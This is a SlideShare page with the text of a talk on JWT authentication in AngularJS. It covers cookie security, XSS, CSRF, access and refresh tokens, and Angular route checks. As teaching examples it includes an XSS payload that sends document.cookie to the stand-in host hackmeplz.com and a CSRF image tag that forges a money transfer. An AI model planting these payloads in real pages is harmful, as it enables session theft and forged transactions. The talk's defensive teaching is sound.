SlideShare a Scribd company logo

JWT Authentication with AngularJS

Download as PPTX, PDF
R
robertjd

This document discusses using JSON Web Tokens (JWT) for authentication with AngularJS. It begins with an overview of JWT, explaining that they are composed of a header, payload, and signature. The payload contains claims about the user like ID, expiration, and scope. JWTs can be issued by a server and verified by the signature without needing a database lookup. The document then discusses storing and transmitting JWTs securely in cookies rather than local storage due to cross-site scripting vulnerabilities. It provides examples of using JWTs to determine if a user is logged in and if they have access to a particular view in Angular using resolves, events, and checking the token payload.

Engineering
1 of 62
Downloaded 68 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
JWT Authentication with AngularJS (or any other front-end framework) Robert Damphousse @robertjd_ Lead Front-End Developer, Stormpath
About Me • Full-stack developer 10 years • Full-stack with JavaScript since 2011 (Node.js + Angular) • Currently leading JavaScript at Stormpath
About Stormpath • Cloud-based User Identity API for Developers • Authentication and Authorization as-as-service • RESTful API • Active Directory, LDAP, and SAML Integration • Private Deployments (AWS) • Free plan for developers
Slideshare URL: http://goo.gl/AWaE5D
Talk Overview • Recap: Session Identifiers • Cookies, The Right Way ® • Introduction to JWT • Access Tokens & Refresh Tokens • Storing JWTs in the Browser • Angular specifics
Recap: Session Identifiers
Verify username & password Create a session ID, link to user Stores session ID in a cookie Recap: Session Identifiers
JWT Authentication with AngularJS
Session ID Concerns • They’re opaque and have no meaning (they’re just pointers). • Database heavy: session ID lookup on *every request*. • Cookies need to be secured to prevent session hijacking.
Cookies, The Right Way ®
Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can steal the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit. • Set Secure flag on cookies.
Cross-Site Scripting (XSS)
XSS Attacks This is a very REAL problem Happens when attacker code is run inside a browser, on your domain. Can be used to steal your cookies!
XSS Attack Demo Source: https://www.google.com/about/appsecurity/learning/xss/#StoredXSS
XSS Attack Demo
XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
XSS Attack Demo GET https://hackmeplz.com/yourCookies.png/?cook ies=SessionID=123412341234 Your browser is going to make this request: Which means..
JWT Authentication with AngularJS
XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this for you, but read the docs for caveats!)
XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
XSS Attack – What Can I Do? XSS Resources: https://www.owasp.org/index.php/XSS https://www.google.com/about/appsecurity/lear ning/xss/
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests
Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://trustyapp.com/transferMo ney?to=BadGuy&amount=10000”/> .. what happens?
Cross-Site Request Forgery (CSRF) • Browser sends cookies for trustyapp.com • Server trusts cookies AND assumes this was an intended user action • transfers the money!
Cross-Site Request Forgery (CSRF) The Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps)
Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
Cross-Site Request Forgery (CSRF) CSRF Resources: https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
An Introduction to JSON Web Tokens (JWTs)
Definitions Authentication is proving who you are. Authorization is being granted access to resources. Tokens are used to persist authentication and get authorization. JWT is a token format.
JSON Web Tokens (JWT) In the wild they look like just another ugly string: eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj Xk
JSON Web Tokens (JWT) But they do have a three part structure. Each part is a Base64-URL encoded string: eyJ0eXAiOiJKV1QiLA0KICJhb GciOiJIUzI1NiJ9 . eyJpc3MiOiJqb2UiLA0KICJle HAiOjEzMDA4MTkzODAsDQogIm h0dHA6Ly9leGFtcGxlLmNvbS9 pc19yb290Ijp0cnVlfQ . dBjftJeZ4CVPmB92K27uhbUJU 1p1r_wW1gFWFOEjXk Header Body (‘Claims’) Cryptographic Signature
JSON Web Tokens (JWT) Base64-decode the parts to see the contents: { "typ":"JWT", "alg":"HS256" } { "iss”:”http://trustyapp.com/”, "exp": 1300819380, “sub”: ”users/8983462”, “scope”: “self api/buy” } tß´—™à%O˜v+nî…SZu¯µ€U…8H× Header Body (‘Claims’) Cryptographic Signature
JSON Web Tokens (JWT) The claims body is the best part! It asserts: { "iss": "http://trustyapp.com/", "exp": 1300819380, "sub": "users/8983462", "scope": "self api/buy" } Who issued the token When it expires Who it represents What they can do
Issuing & Verifying JWTs
Issuing JWTs • User has to present credentials to get a token (password, api keys). • Tokens are issued by your server, and signed with a secret key that is private. • The client stores the tokens, and uses them to authenticate requests.
Verifying JWTs • Just check the signature and expiration time! Stateless authentication! • Token declares scope, make authorization decisions locally. • But.. How to revoke stateless authentication?
OAuth2 + JWT Access & Refresh Tokens
Access & Refresh Tokens • Client is given an access and refresh token. • Access token expires before refresh token. • Refresh token is used to get more access tokens. • Access tokens are trusted by signature. • Refresh tokens are checked for revocation.
Whut?? Gives you time-based control over this tradeoff: stateless trust vs. database lookup.
Examples • Super-secure banking application (want to force user out often): • Access token TTL = 1 minutes • Refresh token TTL = 30 minutes • Mobile/social app (user should “always be logged in”) • Access token TTL = 1 hour • Refresh token TTL = 4 years (lifetime of mobile device)
Storing & Transmitting JWTs (in the browser)
Tradeoffs & Concerns • Local Storage is not secure (XSS vulnerable). • Cookies ARE secure, with HttpOnly, Secure flags, and CSRF prevention. • Using the Authorization header is fun but not really necessary. • Cross-domain requests are always hell.
Secure & Painless Tradeoffs (IMO, YMMV) • Use cookies with HttpOnly, Secure flags. • CSRF protection is easy to get right, XSS is easy to get wrong. • Don’t use the Authorization header • Not really needed. • Avoid cross-domain where possible • CORS is straightforward, but why have pain?
Authentication Logic, Using Cookies • Is there an access token cookie? Is it valid? (signature & expiration)? • Yes? Allow the request. • No? Try to get a new access token, using the refresh token. • Did that work? • Yes? Allow the request, send new access token on response as cookie. • No? Reject the request, delete refresh token cookie.
So… AngularJS?
JWT with AngularJS • How do I know if the user is logged in? • How do I know if the user can access a view? • How do I know if access has been revoked?
Is the user logged in? • Cookies can’t tell you this, if using HttpOnly. • Argument FOR putting token in local storage, so JS can inspect. Worth the XSS tradeoff?
Is the user logged in? • Request a /me route, which requires token authentication. • This route returns the user object. • Use a promise to return this object.
angular.module('myapp') .config(function($stateProvider) { $stateProvider .state('home', { url: '/', templateUrl: 'views/home.html', resolve: { user: function($auth) { return $auth.getUser(); } } }); }); UI Router Example
Is the user logged in? • UI Router: use $stateChangeError to handle failed user promise, direct to login view. • ngRoute: $routeChangeError
Is the user logged in? • Maintain $rootScope.user • null = we don’t know yet • false = not logged in • {} = we have the user’s data • Broadcast $authenticated event when user is known.
Can the user access this view? • Another argument for local token storage and inspection. But, XSS! • Otherwise, fetch scope from /me route.
$stateProvider .state('home', { url: '/', templateUrl: 'views/home.html', resolve: { user: function($auth) { return $auth.getUser() .then(function(user){ // can access resource? // return true/false }) } } }); UI Router Example
Has Access Been Revoked? • If you see a 401 from your API service, broadcast an $unauthenticated event. • Redirect to login view.
Fin
Recap • JWTs help with authentication and authorization architecture. • The are NOT a “security” add-on. • They’re a more magical session ID. • Store JWTs securely!
Thanks!
Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com

More Related Content

PPTX
Building Secure User Interfaces With JWTs
robertjd
 
PDF
Json web token api authorization
Giulio De Donato
 
PPTX
Single-Page-Application & REST security
Igor Bossenko
 
PDF
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
PDF
2016 pycontw web api authentication
Micron Technology
 
PPTX
Securing Single Page Applications with Token Based Authentication
Stefan Achtsnit
 
PPTX
Token Authentication for Java Applications
Stormpath
 
PPTX
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 
Building Secure User Interfaces With JWTs
robertjd
 
Json web token api authorization
Giulio De Donato
 
Single-Page-Application & REST security
Igor Bossenko
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
2016 pycontw web api authentication
Micron Technology
 
Securing Single Page Applications with Token Based Authentication
Stefan Achtsnit
 
Token Authentication for Java Applications
Stormpath
 
Securing RESTful APIs using OAuth 2 and OpenID Connect
Jonathan LeBlanc
 

What's hot (20)

PPTX
REST Service Authetication with TLS & JWTs
Jon Todd
 
PPTX
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
PPTX
An Introduction to OAuth2
Aaron Parecki
 
PDF
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
PPTX
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
PPTX
Micro Web Service - Slim and JWT
Tuyen Vuong
 
PDF
What are JSON Web Tokens and Why Should I Care?
Derek Edwards
 
PDF
OAuth 2.0
Uwe Friedrichsen
 
PDF
ConFoo 2015 - Securing RESTful resources with OAuth2
Rodrigo Cândido da Silva
 
PDF
Rest Security with JAX-RS
Frank Kim
 
PDF
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
PDF
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
PDF
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
PDF
Demystifying OAuth 2.0
Karl McGuinness
 
PDF
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
PDF
Building an API Security Ecosystem
Prabath Siriwardena
 
PDF
Securing REST APIs
Claire Hunsaker
 
PDF
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
PDF
OAuth2 and Spring Security
Orest Ivasiv
 
PDF
What the Heck is OAuth and Open ID Connect? - UberConf 2017
Matt Raible
 
REST Service Authetication with TLS & JWTs
Jon Todd
 
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
An Introduction to OAuth2
Aaron Parecki
 
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
Micro Web Service - Slim and JWT
Tuyen Vuong
 
What are JSON Web Tokens and Why Should I Care?
Derek Edwards
 
OAuth 2.0
Uwe Friedrichsen
 
ConFoo 2015 - Securing RESTful resources with OAuth2
Rodrigo Cândido da Silva
 
Rest Security with JAX-RS
Frank Kim
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
Modern Security with OAuth 2.0 and JWT and Spring by Dmitry Buzdin
Java User Group Latvia
 
Stateless authentication with OAuth 2 and JWT - JavaZone 2015
Alvaro Sanchez-Mariscal
 
Demystifying OAuth 2.0
Karl McGuinness
 
Stateless Auth using OAuth2 & JWT
Gaurav Roy
 
Building an API Security Ecosystem
Prabath Siriwardena
 
Securing REST APIs
Claire Hunsaker
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
OAuth2 and Spring Security
Orest Ivasiv
 
What the Heck is OAuth and Open ID Connect? - UberConf 2017
Matt Raible
 
Ad

Viewers also liked (20)

PDF
TDC2016POA | Trilha PHP - Desenvolvendo um buscador com PHP e Elasticsearch
tdc-globalcode
 
ODP
Bigdata na pratica: Resolvendo problemas de performance com hadoop
tdc-globalcode
 
PPT
Web 2.0 - From a Social to a Service Web
Jury Konga
 
PDF
Gateway and secure micro services
Jordan Valdma
 
PDF
Web 2.0 Expo Berlin: OpenID Emerging from Web 2.0
David Recordon
 
PDF
JWT Agile Framework
Emmanuel Flores Elías
 
PPTX
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
PPT
Understanding OpenID
Prabath Siriwardena
 
PDF
Stateless Auth using OAUTH2 & JWT
Mobiliya
 
PDF
OpenID Bootcamp Tutorial
David Recordon
 
PDF
OpenID Authentication by example
Chris Vertonghen
 
PDF
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Matt Raible
 
PDF
Getting Started With Angular
Stormpath
 
PPTX
Instant Security & Scalable User Management with Spring Boot
Stormpath
 
PDF
Securing Web Applications with Token Authentication
Stormpath
 
PDF
The Ultimate Guide to Mobile API Security
Stormpath
 
PDF
Protractor: Tips & Tricks
Sergey Bolshchikov
 
PDF
SAML / OpenID Connect / OAuth / SCIM 技術解説 - ID&IT 2014 #idit2014
Nov Matake
 
PDF
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
PPTX
REST API Security: OAuth 2.0, JWTs, and More!
Stormpath
 
TDC2016POA | Trilha PHP - Desenvolvendo um buscador com PHP e Elasticsearch
tdc-globalcode
 
Bigdata na pratica: Resolvendo problemas de performance com hadoop
tdc-globalcode
 
Web 2.0 - From a Social to a Service Web
Jury Konga
 
Gateway and secure micro services
Jordan Valdma
 
Web 2.0 Expo Berlin: OpenID Emerging from Web 2.0
David Recordon
 
JWT Agile Framework
Emmanuel Flores Elías
 
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Understanding OpenID
Prabath Siriwardena
 
Stateless Auth using OAUTH2 & JWT
Mobiliya
 
OpenID Bootcamp Tutorial
David Recordon
 
OpenID Authentication by example
Chris Vertonghen
 
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Matt Raible
 
Getting Started With Angular
Stormpath
 
Instant Security & Scalable User Management with Spring Boot
Stormpath
 
Securing Web Applications with Token Authentication
Stormpath
 
The Ultimate Guide to Mobile API Security
Stormpath
 
Protractor: Tips & Tricks
Sergey Bolshchikov
 
SAML / OpenID Connect / OAuth / SCIM 技術解説 - ID&IT 2014 #idit2014
Nov Matake
 
Stateless authentication for microservices
Alvaro Sanchez-Mariscal
 
REST API Security: OAuth 2.0, JWTs, and More!
Stormpath
 
Ad

Similar to JWT Authentication with AngularJS (20)

PPTX
Browser Security 101
Stormpath
 
PPTX
IEEE WEB DOCUMENT PPT FOR EXPLANATION OF THE TOPIC
sujalmacbookm2air
 
PDF
API SECURITY
Tubagus Rizky Dharmawan
 
PPTX
Complete Guide to Setup Secure Scheme for Restful APIs
Xing (Xingheng) Wang
 
PDF
Securing your AngularJS Application
Philippe De Ryck
 
PPTX
Confidence web
Dan Kaminsky
 
PDF
De la bonne utilisation de OAuth2
Leonard Moustacchis
 
PPTX
WebHack #13 Web authentication essentials
昉达 王
 
PPTX
O auth2 with angular js
Bixlabs
 
PPTX
Spa Secure Coding Guide
Geoffrey Vandiest
 
PDF
JDD2015: Security in the era of modern applications and services - Bolesław D...
PROIDEA
 
PDF
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
PPTX
Introduction to Web Security
Kamil Lelonek
 
PPTX
Token-based uthentication
Will Adams
 
PPT
Securing RESTful API
Muhammad Zbeedat
 
PPTX
cookie attributes and tokens,jwt tokens1.ppt
ShivakumarBejjenki1
 
PPTX
Dmk sb2010 web_defense
Dan Kaminsky
 
PDF
OAuth and why you should use it
Sergey Podgornyy
 
PPTX
CBSecurity 3 - Secure Your ColdBox Applications
Ortus Solutions, Corp
 
PPTX
How to Use Stormpath in angular js
Stormpath
 
Browser Security 101
Stormpath
 
IEEE WEB DOCUMENT PPT FOR EXPLANATION OF THE TOPIC
sujalmacbookm2air
 
API SECURITY
Tubagus Rizky Dharmawan
 
Complete Guide to Setup Secure Scheme for Restful APIs
Xing (Xingheng) Wang
 
Securing your AngularJS Application
Philippe De Ryck
 
Confidence web
Dan Kaminsky
 
De la bonne utilisation de OAuth2
Leonard Moustacchis
 
WebHack #13 Web authentication essentials
昉达 王
 
O auth2 with angular js
Bixlabs
 
Spa Secure Coding Guide
Geoffrey Vandiest
 
JDD2015: Security in the era of modern applications and services - Bolesław D...
PROIDEA
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
Sam Bowne
 
Introduction to Web Security
Kamil Lelonek
 
Token-based uthentication
Will Adams
 
Securing RESTful API
Muhammad Zbeedat
 
cookie attributes and tokens,jwt tokens1.ppt
ShivakumarBejjenki1
 
Dmk sb2010 web_defense
Dan Kaminsky
 
OAuth and why you should use it
Sergey Podgornyy
 
CBSecurity 3 - Secure Your ColdBox Applications
Ortus Solutions, Corp
 
How to Use Stormpath in angular js
Stormpath
 

Recently uploaded (20)

PDF
July 2025 - Top 10 Read Articles in International Journal of Software Enginee...
sebastianku31
 
PDF
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
jpsjournal1
 
PPTX
Sustainable Sites - Green Building Construction
mhdumerali
 
PPT
Mechanical Engineering MATERIALS Selection
arsalanahmad705384
 
PPTX
bas. eng. economics group 4 presentation 1.pptx
kiribakimoses1993
 
PPTX
MCN 401 KTU-2019-PPE KITS-MODULE 2.pptx
VinayB68
 
PDF
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
mojeeburahmanwardak
 
PPTX
Welding lecture in detail for understanding
sahilpoonia10
 
PPTX
Infosys Presentation by1.Riyan Bagwan 2.Samadhan Naiknavare 3.Gaurav Shinde 4...
bapushinde7218
 
PPTX
Lesson 3_Tessellation.pptx finite Mathematics
quakeplayz54
 
PPTX
KTU 2019 -S7-MCN 401 MODULE 2-VINAY.pptx
VinayB68
 
PPTX
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
VinayB68
 
PDF
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
smceramu
 
PDF
The CXO Playbook 2025 – Future-Ready Strategies for C-Suite Leaders Cerebrai...
Cerebraix Technologies
 
PPTX
Strings in CPP - Strings in C++ are sequences of characters used to store and...
sangeethamtech26
 
PPTX
Construction Project Organization Group 2.pptx
vj5agdales
 
PPTX
IOT PPTs Week 10 Lecture Material.pptx of NPTEL Smart Cities contd
ssusera400e8
 
PDF
BMEC211 - INTRODUCTION TO MECHATRONICS-1.pdf
ryankakungu
 
PDF
Structs to JSON How Go Powers REST APIs.pdf
Emily Achieng
 
PPTX
OOP with Java - Java Introduction (Basics)
Rashmi T V
 
July 2025 - Top 10 Read Articles in International Journal of Software Enginee...
sebastianku31
 
Evaluating the Democratization of the Turkish Armed Forces from a Normative P...
jpsjournal1
 
Sustainable Sites - Green Building Construction
mhdumerali
 
Mechanical Engineering MATERIALS Selection
arsalanahmad705384
 
bas. eng. economics group 4 presentation 1.pptx
kiribakimoses1993
 
MCN 401 KTU-2019-PPE KITS-MODULE 2.pptx
VinayB68
 
keyrequirementskkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
mojeeburahmanwardak
 
Welding lecture in detail for understanding
sahilpoonia10
 
Infosys Presentation by1.Riyan Bagwan 2.Samadhan Naiknavare 3.Gaurav Shinde 4...
bapushinde7218
 
Lesson 3_Tessellation.pptx finite Mathematics
quakeplayz54
 
KTU 2019 -S7-MCN 401 MODULE 2-VINAY.pptx
VinayB68
 
MET 305 2019 SCHEME MODULE 2 COMPLETE.pptx
VinayB68
 
SM_6th-Sem__Cse_Internet-of-Things.pdf IOT
smceramu
 
The CXO Playbook 2025 – Future-Ready Strategies for C-Suite Leaders Cerebrai...
Cerebraix Technologies
 
Strings in CPP - Strings in C++ are sequences of characters used to store and...
sangeethamtech26
 
Construction Project Organization Group 2.pptx
vj5agdales
 
IOT PPTs Week 10 Lecture Material.pptx of NPTEL Smart Cities contd
ssusera400e8
 
BMEC211 - INTRODUCTION TO MECHATRONICS-1.pdf
ryankakungu
 
Structs to JSON How Go Powers REST APIs.pdf
Emily Achieng
 
OOP with Java - Java Introduction (Basics)
Rashmi T V
 

JWT Authentication with AngularJS

  • 1. JWT Authentication with AngularJS (or any other front-end framework) Robert Damphousse @robertjd_ Lead Front-End Developer, Stormpath
  • 2. About Me • Full-stack developer 10 years • Full-stack with JavaScript since 2011 (Node.js + Angular) • Currently leading JavaScript at Stormpath
  • 3. About Stormpath • Cloud-based User Identity API for Developers • Authentication and Authorization as-as-service • RESTful API • Active Directory, LDAP, and SAML Integration • Private Deployments (AWS) • Free plan for developers
  • 5. Talk Overview • Recap: Session Identifiers • Cookies, The Right Way ® • Introduction to JWT • Access Tokens & Refresh Tokens • Storing JWTs in the Browser • Angular specifics
  • 7. Verify username & password Create a session ID, link to user Stores session ID in a cookie Recap: Session Identifiers
  • 9. Session ID Concerns • They’re opaque and have no meaning (they’re just pointers). • Database heavy: session ID lookup on *every request*. • Cookies need to be secured to prevent session hijacking.
  • 11. Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
  • 12. Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can steal the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit. • Set Secure flag on cookies.
  • 14. XSS Attacks This is a very REAL problem Happens when attacker code is run inside a browser, on your domain. Can be used to steal your cookies!
  • 15. XSS Attack Demo Source: https://www.google.com/about/appsecurity/learning/xss/#StoredXSS
  • 17. XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
  • 20. XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this for you, but read the docs for caveats!)
  • 21. XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
  • 22. XSS Attack – What Can I Do? XSS Resources: https://www.owasp.org/index.php/XSS https://www.google.com/about/appsecurity/lear ning/xss/
  • 24. Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests
  • 25. Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://trustyapp.com/transferMo ney?to=BadGuy&amount=10000”/> .. what happens?
  • 26. Cross-Site Request Forgery (CSRF) • Browser sends cookies for trustyapp.com • Server trusts cookies AND assumes this was an intended user action • transfers the money!
  • 27. Cross-Site Request Forgery (CSRF) The Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps)
  • 28. Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
  • 29. http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
  • 30. WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
  • 31. Cross-Site Request Forgery (CSRF) CSRF Resources: https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
  • 32. An Introduction to JSON Web Tokens (JWTs)
  • 33. Definitions Authentication is proving who you are. Authorization is being granted access to resources. Tokens are used to persist authentication and get authorization. JWT is a token format.
  • 34. JSON Web Tokens (JWT) In the wild they look like just another ugly string: eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj Xk
  • 35. JSON Web Tokens (JWT) But they do have a three part structure. Each part is a Base64-URL encoded string: eyJ0eXAiOiJKV1QiLA0KICJhb GciOiJIUzI1NiJ9 . eyJpc3MiOiJqb2UiLA0KICJle HAiOjEzMDA4MTkzODAsDQogIm h0dHA6Ly9leGFtcGxlLmNvbS9 pc19yb290Ijp0cnVlfQ . dBjftJeZ4CVPmB92K27uhbUJU 1p1r_wW1gFWFOEjXk Header Body (‘Claims’) Cryptographic Signature
  • 36. JSON Web Tokens (JWT) Base64-decode the parts to see the contents: { "typ":"JWT", "alg":"HS256" } { "iss”:”http://trustyapp.com/”, "exp": 1300819380, “sub”: ”users/8983462”, “scope”: “self api/buy” } tß´—™à%O˜v+nî…SZu¯µ€U…8H× Header Body (‘Claims’) Cryptographic Signature
  • 37. JSON Web Tokens (JWT) The claims body is the best part! It asserts: { "iss": "http://trustyapp.com/", "exp": 1300819380, "sub": "users/8983462", "scope": "self api/buy" } Who issued the token When it expires Who it represents What they can do
  • 39. Issuing JWTs • User has to present credentials to get a token (password, api keys). • Tokens are issued by your server, and signed with a secret key that is private. • The client stores the tokens, and uses them to authenticate requests.
  • 40. Verifying JWTs • Just check the signature and expiration time! Stateless authentication! • Token declares scope, make authorization decisions locally. • But.. How to revoke stateless authentication?
  • 41. OAuth2 + JWT Access & Refresh Tokens
  • 42. Access & Refresh Tokens • Client is given an access and refresh token. • Access token expires before refresh token. • Refresh token is used to get more access tokens. • Access tokens are trusted by signature. • Refresh tokens are checked for revocation.
  • 43. Whut?? Gives you time-based control over this tradeoff: stateless trust vs. database lookup.
  • 44. Examples • Super-secure banking application (want to force user out often): • Access token TTL = 1 minutes • Refresh token TTL = 30 minutes • Mobile/social app (user should “always be logged in”) • Access token TTL = 1 hour • Refresh token TTL = 4 years (lifetime of mobile device)
  • 46. Tradeoffs & Concerns • Local Storage is not secure (XSS vulnerable). • Cookies ARE secure, with HttpOnly, Secure flags, and CSRF prevention. • Using the Authorization header is fun but not really necessary. • Cross-domain requests are always hell.
  • 47. Secure & Painless Tradeoffs (IMO, YMMV) • Use cookies with HttpOnly, Secure flags. • CSRF protection is easy to get right, XSS is easy to get wrong. • Don’t use the Authorization header • Not really needed. • Avoid cross-domain where possible • CORS is straightforward, but why have pain?
  • 48. Authentication Logic, Using Cookies • Is there an access token cookie? Is it valid? (signature & expiration)? • Yes? Allow the request. • No? Try to get a new access token, using the refresh token. • Did that work? • Yes? Allow the request, send new access token on response as cookie. • No? Reject the request, delete refresh token cookie.
  • 50. JWT with AngularJS • How do I know if the user is logged in? • How do I know if the user can access a view? • How do I know if access has been revoked?
